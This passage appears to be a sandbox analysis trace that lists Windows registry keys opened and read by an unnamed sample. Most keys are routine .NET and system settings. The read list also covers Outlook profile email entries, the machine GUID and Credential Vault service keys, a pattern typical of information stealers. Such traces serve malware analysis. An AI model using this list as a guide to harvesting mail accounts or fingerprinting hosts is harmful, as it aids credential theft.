HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\Config HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson HKEY_LOCAL_MACHINE\Software\Microsoft\RADAR\HeapLeakDetection\Settings HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenServiceDebugLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Client HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Client\Install HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGEN_USE_PRIVATE_STORE HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DefaultVersion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Version HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\ZapSet HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NetFramework\v2.0.50727\NGenService\Roots HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\Roots\WorkPending HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENBreakOnWorker HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenRegistryAccessCount HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NetFramework\v2.0.50727\NGENService\State HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\State\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\State\ExtraInstallSteps HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceBreakOnStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenMaxLogSize HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceTestHookDll HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServicePolicy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NetFramework\v2.0.50727\NGENService\ListenedState HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\ListenedState\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\ListenedState\RootstoreDirty HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENUseService HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorsvw.exe HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NetFramework\v2.0.50727\NGENService\State\PendingReboot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceWaitAggressiveWork HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceConservative HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceWaitWorking HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenWorkerCount HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\EnableMultiproc HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\SvcRetryNgenFailures HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenLocalWorker HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceRestrictWorkersPrivileges HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\State\PendingUpdate HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceWorkerPriority HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGenServiceDebugLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NicPath HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\RegistryRoot HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AssemblyPath HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AssemblyPath2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Client\Install HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGEN_USE_PRIVATE_STORE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DefaultVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Version HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\ZapSet HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGENService\Roots\WorkPending HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGENBreakOnWorker HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGenRegistryAccessCount HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGENService\State\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGENService\State\ExtraInstallSteps HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CLRLoadLogDir
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\B204B4C2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath 